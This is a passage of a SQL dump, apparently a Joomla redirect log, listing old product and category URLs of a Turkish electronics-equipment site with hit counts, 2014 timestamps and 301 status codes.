00:00:00',301),(1322,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=36&Itemid=&lang=tr','','','',1,0,'2014-08-06 19:14:55','0000-00-00 00:00:00',301),(1323,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=86:mx350&catid=36:orta-hizli&Itemid=98&lang=en','','','',4,0,'2014-08-06 19:15:58','0000-00-00 00:00:00',301),(1324,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default&lang=en','','','',12,0,'2014-08-06 19:16:58','0000-00-00 00:00:00',301),(1325,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=138:flo-master-z-&catid=56:rework-stasyonlari&Itemid=140&lang=en','','','',9,0,'2014-08-06 19:17:41','0000-00-00 00:00:00',301),(1326,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=161&lang=tr','','','',1,0,'2014-08-06 19:19:14','0000-00-00 00:00:00',301),(1327,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=60:ikinciel&Itemid=164&layout=default&lang=en','','','',2,0,'2014-08-06 19:19:19','0000-00-00 00:00:00',301),(1328,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=106&Itemid=113&lang=en','','','',2,0,'2014-08-06 19:19:45','0000-00-00 00:00:00',301),(1329,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=42:th-dizgi&Itemid=27&layout=default&lang=en','','','',11,0,'2014-08-06 19:20:17','0000-00-00 00:00:00',301),(1330,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=138&lang=en','','','',6,0,'2014-08-06 19:21:41','0000-00-00 00:00:00',301),(1331,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=49&Itemid=61&lang=en','','','',18,0,'2014-08-06 19:22:39','0000-00-00 00:00:00',301),(1332,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default&lang=en','','','',61,0,'2014-08-06 19:22:42','0000-00-00 00:00:00',301),(1333,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=59:bolgesel-lehimleme-mak&Itemid=155&layout=default&lang=en','','','',12,0,'2014-08-06 19:22:47','0000-00-00 00:00:00',301),(1334,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=46:konveyorler&Itemid=62&layout=default&lang=en','','','',6,0,'2014-08-06 19:24:10','0000-00-00 00:00:00',301),(1335,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=168:aoibilgi&catid=47:aoi&Itemid=58&lang=tr','','','',35,0,'2014-08-06 19:24:56','0000-00-00 00:00:00',301),(1336,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160&lang=tr','','','',11,0,'2014-08-06 19:25:29','0000-00-00 00:00:00',301),(1337,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=111&Itemid=122&lang=tr','','','',2,0,'2014-08-06 19:26:20','0000-00-00 00:00:00',301),(1338,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=category&id=43&Itemid=2&lang=en','','','',13,0,'2014-08-06 19:27:04','0000-00-00 00:00:00',301),(1339,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=107&Itemid=118&lang=tr','','','',17,0,'2014-08-06 19:27:23','0000-00-00 00:00:00',301),(1340,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=107&Itemid=118&lang=tr','','','',1,0,'2014-08-06 19:27:31','0000-00-00 00:00:00',301),(1341,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=119&Itemid=117&lang=tr','','','',5,0,'2014-08-06 19:27:37','0000-00-00 00:00:00',301),(1342,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=91:osai-neo&catid=1:son-haberler&Itemid=28&lang=en','','','',6,0,'2014-08-06 19:28:33','0000-00-00 00:00:00',301),(1343,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=150&lang=tr','','','',4,0,'2014-08-06 19:36:14','0000-00-00 00:00:00',301),(1344,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149&Itemid=150&lang=tr','','','',2,0,'2014-08-06 19:38:03','0000-00-00 00:00:00',301),(1345,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=87&Itemid=99&lang=tr','','','',1,0,'2014-08-06 19:48:11','0000-00-00 00:00:00',301),(1346,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=146&lang=en','','','',4,0,'2014-08-06 19:57:51','0000-00-00 00:00:00',301),(1347,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=155&Itemid=81&lang=tr','','','',2,0,'2014-08-06 19:59:33','0000-00-00 00:00:00',301),(1348,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=115&lang=tr','','','',6,0,'2014-08-06 20:11:31','0000-00-00 00:00:00',301),(1349,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=176:jvk1&catid=60:ikinciel&Itemid=164&lang=en','','','',9,0,'2014-08-06 20:23:24','0000-00-00 00:00:00',301),(1350,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=149&Itemid=150&lang=en','','','',3,0,'2014-08-06 20:38:05','0000-00-00 00:00:00',301),(1351,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=47&Itemid=1&lang=tr','','','',4,0,'2014-08-06 20:57:36','0000-00-00 00:00:00',301),(1352,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=82&Itemid=38&lang=en','','','',20,0,'2014-08-06 20:59:34','0000-00-00 00:00:00',301),(1353,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=149&Itemid=150&lang=tr','','','',3,0,'2014-08-06 21:00:33','0000-00-00 00:00:00',301),(1354,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=category&id=51:neo&Itemid=92&layout=default&lang=en','','','',9,0,'2014-08-06 21:04:57','0000-00-00 00:00:00',301),(1355,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123&lang=en','','','',12,0,'2014-08-06 21:20:28','0000-00-00 00:00:00',301),(1356,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=146&Itemid=148&lang=en','','','',26,0,'2014-08-06 21:26:58','0000-00-00 00:00:00',301),(1357,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=107:yuksek-guclu-flux-giderici-frc&catid=40:temizleme&Itemid=118&lang=en','','','',3,0,'2014-08-06 21:27:13','0000-00-00 00:00:00',301),(1358,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147&Itemid=146&lang=en','','','',3,0,'2014-08-06 21:27:31','0000-00-00 00:00:00',301),(1359,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=146&lang=en','','','',6,0,'2014-08-06 21:27:39','0000-00-00 00:00:00',301),(1360,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=146&lang=en','','','',1,0,'2014-08-06 21:27:48','0000-00-00 00:00:00',301),(1361,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=107:yuksek-guclu-flux-giderici-frc&catid=40:temizleme&Itemid=118&lang=en','','','',7,0,'2014-08-06 21:29:23','0000-00-00 00:00:00',301),(1362,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=107:yuksek-guclu-flux-giderici-frc&catid=40:temizleme&Itemid=118&lang=en','','','',9,0,'2014-08-06 21:32:04','0000-00-00 00:00:00',301),(1363,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=146&lang=en','','','',8,0,'2014-08-06 21:39:08','0000-00-00 00:00:00',301),(1364,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default&lang=en','','','',2,0,'2014-08-06 21:53:24','0000-00-00 00:00:00',301),(1365,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=88&Itemid=100','','','',6,0,'2014-08-06 21:53:38','0000-00-00 00:00:00',301),(1366,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=84:neoplace&catid=51:neo&Itemid=96&lang=en','','','',3,0,'2014-08-06 21:56:17','0000-00-00 00:00:00',301),(1367,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147&Itemid=146&lang=en','','','',4,0,'2014-08-06 21:56:48','0000-00-00 00:00:00',301),(1368,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=84:neoplace&catid=51:neo&Itemid=96&lang=en','','','',11,0,'2014-08-06 21:57:52','0000-00-00 00:00:00',301),(1369,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=122:stencilwasher-eco&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=&lang=en','','','',1,0,'2014-08-06 22:00:07','0000-00-00 00:00:00',301),(1370,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=147&lang=en','','','',7,0,'2014-08-06 22:03:50','0000-00-00 00:00:00',301),(1371,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=89:neosold&catid=51:neo&Itemid=101&lang=en','','','',5,0,'2014-08-06 22:16:53','0000-00-00 00:00:00',301),(1372,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119&Itemid=117&lang=tr','','','',3,0,'2014-08-06 22:18:07','0000-00-00 00:00:00',301),(1373,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=58&Itemid=149&lang=tr','','','',10,0,'2014-08-06 22:19:23','0000-00-00 00:00:00',301),(1374,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default&lang=en','','','',7,0,'2014-08-06 22:21:36','0000-00-00 00:00:00',301),(1375,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=164&lang=tr','','','',2,0,'2014-08-06 22:26:42','0000-00-00 00:00:00',301),(1376,'http://3s-technologies.com.tr/index.php?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=164','','','',1,0,'2014-08-06 22:26:47','0000-00-00 00:00:00',301),(1377,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=164','','','',2,0,'2014-08-06 22:27:04','0000-00-00 00:00:00',301),(1378,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=166:lfs-1&catid=44:pota&Itemid=144&lang=tr','','','',42,0,'2014-08-06 22:37:06','0000-00-00 00:00:00',301),(1379,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=138&lang=en','','','',12,0,'2014-08-06 22:46:07','0000-00-00 00:00:00',301),(1380,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=138&lang=en','','','',3,0,'2014-08-06 22:53:16','0000-00-00 00:00:00',301),(1381,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=121&Itemid=115&lang=en','','','',3,0,'2014-08-06 22:59:16','0000-00-00 00:00:00',301),(1382,'http://3s-technologies.com.tr/index.php?option=com_content&view=category&id=42&Itemid=27&lang=tr','','','',3,0,'2014-08-06 23:03:23','0000-00-00 00:00:00',301),(1383,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=46:konveyorler&Itemid=62&layout=default&lang=tr','','','',9,0,'2014-08-06 23:16:29','0000-00-00 00:00:00',301),(1384,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=112:smd-firin-temizleme-roc&catid=40:temizleme&Itemid=123&lang=tr','','','',6,0,'2014-08-06 23:26:55','0000-00-00 00:00:00',301),(1385,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=109&Itemid=120&lang=en','','','',3,0,'2014-08-07 00:13:25','0000-00-00 00:00:00',301),(1386,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=150:le40&catid=58:dusuk-hizli-smd-dizgi&Itemid=0&lang=tr','','','',1,0,'2014-08-07 00:18:42','0000-00-00 00:00:00',301),(1387,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=1&layout=blog&lang=en&limitstart=5&Itemid=0','','','',2,0,'2014-08-07 00:31:56','0000-00-00 00:00:00',301),(1388,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=114:stensil-temizleme-rulolari-microwipe&catid=40:temizleme&Itemid=&lang=en','','','',2,0,'2014-08-07 00:57:38','0000-00-00 00:00:00',301),(1389,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=137&Itemid=139&lang=en','','','',17,0,'2014-08-07 01:00:00','0000-00-00 00:00:00',301),(1390,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=0&lang=en','','','',1,0,'2014-08-07 01:01:03','0000-00-00 00:00:00',301),(1391,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=137&Itemid=139&lang=en','','','',12,0,'2014-08-07 01:02:32','0000-00-00 00:00:00',301),(1392,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=28&lang=en','','','',41,0,'2014-08-07 01:14:41','0000-00-00 00:00:00',301),(1393,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=164:ews-310&catid=44:pota&Itemid=160&lang=en','','','',37,0,'2014-08-07 01:15:47','0000-00-00 00:00:00',301),(1394,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=158&Itemid=159','','','',1,0,'2014-08-07 01:39:09','0000-00-00 00:00:00',301),(1395,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153&lang=tr','','','',20,0,'2014-08-07 01:41:02','0000-00-00 00:00:00',301),(1396,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=147&lang=tr','','','',10,0,'2014-08-07 01:42:24','0000-00-00 00:00:00',301),(1397,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=119&Itemid=117&lang=tr','','','',2,0,'2014-08-07 01:43:28','0000-00-00 00:00:00',301),(1398,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=99&Itemid=43&lang=tr','','','',6,0,'2014-08-07 01:48:23','0000-00-00 00:00:00',301),(1399,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=159&lang=tr','','','',2,0,'2014-08-07 01:54:13','0000-00-00 00:00:00',301),(1400,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=58&Itemid=0&lang=en','','','',1,0,'2014-08-07 01:57:26','0000-00-00 00:00:00',301),(1401,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=158:14fsfd&catid=44:pota&Itemid=159&lang=en','','','',11,0,'2014-08-07 02:05:21','0000-00-00 00:00:00',301),(1402,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=145:asp-300&catid=57:screen-printer&Itemid=147&lang=tr','','','',1,0,'2014-08-07 02:05:28','0000-00-00 00:00:00',301),(1403,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=119&Itemid=117&lang=en','','','',1,0,'2014-08-07 02:05:37','0000-00-00 00:00:00',301),(1404,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=113&Itemid=125&lang=tr','','','',12,0,'2014-08-07 02:10:28','0000-00-00 00:00:00',301),(1405,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=97&Itemid=108&lang=en','','','',6,0,'2014-08-07 02:11:19','0000-00-00 00:00:00',301),(1406,'http://www.3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=155:ct-3000n&catid=44:pota&Itemid=81&lang=tr','','','',3,0,'2014-08-07 02:12:22','0000-00-00 00:00:00',301),(1407,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=165:microcare&catid=1:son-haberler&Itemid=28&lang=tr','','','',2,0,'2014-08-07 02:15:04','0000-00-00 00:00:00',301),(1408,'http://3s-technologies.com.tr/index.php/en/?option=com_content&view=article&id=140&Itemid=142&lang=tr','','','',43,0,'2014-08-07 02:20:57','0000-00-00 00:00:00',301),(1409,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44:pota&Itemid=56&layout=default&lang=en','','','',5,0,'2014-08-07 02:32:30','0000-00-00 00:00:00',301),(1410,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=28&lang=en','','','',7,0,'2014-08-07 02:42:34','0000-00-00 00:00:00',301),(1411,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=category&id=46&Itemid=62&lang=en','','','',28,0,'2014-08-07 02:59:26','0000-00-00 00:00:00',301),(1412,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=110&Itemid=121&lang=tr','','','',6,0,'2014-08-07 03:06:14','0000-00-00 00:00:00',301),(1413,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=96&Itemid=107&lang=tr','','','',2,0,'2014-08-07 03:06:47','0000-00-00 00:00:00',301),(1414,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=47&Itemid=0&lang=en','','','',1,0,'2014-08-07 03:11:55','0000-00-00 00:00:00',301),(1415,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=121:trident&catid=54:pcb-ve-stensil-temizleme-makineleri&Itemid=115&lang=tr','','','',2,0,'2014-08-07 03:27:35','0000-00-00 00:00:00',301),(1416,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39&Itemid=57&lang=tr','','','',7,0,'2014-08-07 03:58:01','0000-00-00 00:00:00',301),(1417,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=150&Itemid=151&lang=tr','','','',2,0,'2014-08-07 04:05:52','0000-00-00 00:00:00',301),(1418,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=139&lang=tr','','','',2,0,'2014-08-07 04:08:27','0000-00-00 00:00:00',301),(1419,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=89&Itemid=101&lang=en','','','',40,0,'2014-08-07 04:23:24','0000-00-00 00:00:00',301),(1420,'http://www.3s-technologies.com.tr/index.php/en/?option=com_content&view=category&id=57:screen-printer&Itemid=145&layout=default&lang=en','','','',15,0,'2014-08-07 04:39:16','0000-00-00 00:00:00',301),(1421,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&Itemid=146&lang=tr','','','',3,0,'2014-08-07 04:41:27','0000-00-00 00:00:00',301),(1422,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=152:ls60&catid=58:dusuk-hizli-smd-dizgi&Itemid=153&lang=tr','','','',22,0,'2014-08-07 04:57:07','0000-00-00 00:00:00',301),(1423,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=167:lr4&catid=41:smd-firin&Itemid=163&lang=tr','','','',4,0,'2014-08-07 05:11:14','0000-00-00 00:00:00',301),(1424,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40:temizleme&Itemid=60&layout=default&lang=en','','','',7,0,'2014-08-07 05:43:44','0000-00-00 00:00:00',301),(1425,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=81&Itemid=40&lang=en','','','',1,0,'2014-08-07 06:00:23','0000-00-00 00:00:00',301),(1426,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44:pota&Itemid=56&layout=default','','','',1,0,'2014-08-07 06:00:37','0000-00-00 00:00:00',301),(1427,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=105:r-500&catid=41:smd-firin&Itemid=112&lang=tr','','','',9,0,'2014-08-07 06:00:51','0000-00-00 00:00:00',301),(1428,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=146&Itemid=148&lang=en','','','',1,0,'2014-08-07 06:02:03','0000-00-00 00:00:00',301),(1429,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=54:pcb-ve-stensil-temizleme-makineleri&Itemid=114&layout=default&lang=tr','','','',12,0,'2014-08-07 06:15:05','0000-00-00 00:00:00',301),(1430,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=51&Itemid=92&lang=tr','','','',1,0,'2014-08-07 06:17:29','0000-00-00 00:00:00',301),(1431,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=137:chip-max-rosh-rdy&catid=56:rework-stasyonlari&Itemid=&lang=en','','','',1,0,'2014-08-07 06:17:39','0000-00-00 00:00:00',301),(1432,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42&Itemid=27&lang=tr','','','',1,0,'2014-08-07 06:24:50','0000-00-00 00:00:00',301),(1433,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56:rework-stasyonlari&Itemid=137&layout=default','','','',7,0,'2014-08-07 06:36:21','0000-00-00 00:00:00',301),(1434,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105&Itemid=112&lang=tr','','','',2,0,'2014-08-07 06:48:19','0000-00-00 00:00:00',301),(1435,'http://www.ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=49&Itemid=61&lang=tr','','','',3,0,'2014-08-07 06:51:16','0000-00-00 00:00:00',301),(1436,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=108:yuksek-guclu-flux-giderici-spr&catid=40:temizleme&Itemid=119&lang=en','','','',5,0,'2014-08-07 06:57:45','0000-00-00 00:00:00',301),(1437,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56&Itemid=137&lang=tr','','','',6,0,'2014-08-07 07:39:05','0000-00-00 00:00:00',301),(1438,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126:e-katalog&catid=55:katalog&Itemid=&lang=en','','','',1,0,'2014-08-07 07:42:08','0000-00-00 00:00:00',301),(1439,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=53&Itemid=110&lang=tr','','','',2,0,'2014-08-07 07:47:30','0000-00-00 00:00:00',301),(1440,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=115:kutulanmis-hava-air&catid=40:temizleme&Itemid=0&lang=tr','','','',1,0,'2014-08-07 08:16:52','0000-00-00 00:00:00',301),(1441,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=166&Itemid=144&lang=tr','','','',6,0,'2014-08-07 08:33:32','0000-00-00 00:00:00',301),(1442,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=42&Itemid=27','','','',4,0,'2014-08-07 08:55:01','0000-00-00 00:00:00',301),(1443,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=168:aoibilgi&catid=47:aoi&Itemid=58&lang=tr','','','',20,0,'2014-08-07 09:17:30','0000-00-00 00:00:00',301),(1444,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=136:chipper-smd-500&catid=56:rework-stasyonlari&Itemid=0&lang=en','','','',1,0,'2014-08-07 09:18:02','0000-00-00 00:00:00',301),(1445,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44&Itemid=56&lang=tr','','','',11,0,'2014-08-07 09:45:37','0000-00-00 00:00:00',301),(1446,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=56&Itemid=137&lang=en','','','',4,0,'2014-08-07 09:51:14','0000-00-00 00:00:00',301),(1447,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=140&Itemid=142&lang=en','','','',2,0,'2014-08-07 10:18:35','0000-00-00 00:00:00',301),(1448,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=94&Itemid=105&lang=tr','','','',3,0,'2014-08-07 10:26:06','0000-00-00 00:00:00',301),(1449,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=85&Itemid=97&lang=tr','','','',6,0,'2014-08-07 10:29:54','0000-00-00 00:00:00',301),(1450,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article&id=149:cs40&catid=58:dusuk-hizli-smd-dizgi&Itemid=0&lang=en','','','',1,0,'2014-08-07 10:30:18','0000-00-00 00:00:00',301),(1451,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=81&Itemid=40&lang=en','','','',3,0,'2014-08-07 10:36:13','0000-00-00 00:00:00',301),(1452,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39&Itemid=57','','','',7,0,'2014-08-07 10:38:57','0000-00-00 00:00:00',301),(1453,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=43&Itemid=2&lang=en','','','',4,0,'2014-08-07 10:41:51','0000-00-00 00:00:00',301),(1454,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=173:avf1&catid=60:ikinciel&Itemid=164&lang=tr','','','',10,0,'2014-08-07 10:42:27','0000-00-00 00:00:00',301),(1455,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=90&Itemid=102&lang=en','','','',8,0,'2014-08-07 11:02:20','0000-00-00 00:00:00',301),(1456,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=39&Itemid=57&lang=en','','','',6,0,'2014-08-07 11:02:47','0000-00-00 00:00:00',301),(1457,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php/en/?option=com_content&view=article&id=160:gf-12-hcht&catid=41:smd-firin&Itemid=161&lang=en','','','',35,0,'2014-08-07 11:07:26','0000-00-00 00:00:00',301),(1458,'https://www.led-bazaar.net/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=44:pota&Itemid=56&layout=default','','','',3,0,'2014-08-07 11:09:59','0000-00-00 00:00:00',301),(1459,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=60&Itemid=164&lang=en','','','',11,0,'2014-08-07 11:12:21','0000-00-00 00:00:00',301),(1460,'http://led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=105&Itemid=112&lang=en','','','',4,0,'2014-08-07 11:15:00','0000-00-00 00:00:00',301),(1461,'https://dmb-elektronik.com/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=40&Itemid=60&lang=en&limitstart=10','','','',6,0,'2014-08-07 11:15:36','0000-00-00 00:00:00',301),(1462,'http://3s-technologies.com.tr/index.php/tr/?option=com_content&view=article&id=95&Itemid=106&lang=en','','','',1,0,'2014-08-07 11:19:55','0000-00-00 00:00:00',301),(1463,'http://mail.megatek-elektronik.com.tr/3s-technologies.com.tr/joomla/index.php?option=com_content&view=category&id=41&Itemid=55&lang=tr','','','',4,0,'2014-08-07 11:38:06','0000-00-00 00:00:00',301),(1464,'http://www.led-bazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=126&Itemid=133&lang=en','','','',4,0,'2014-08-07 11:43:43','0000-00-00 00:00:00',301),(1465,'http://ledbazaar.org/3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=124&Itemid=130&lang=tr','','','',5,0,'2014-08-07 12:03:14','0000-00-00 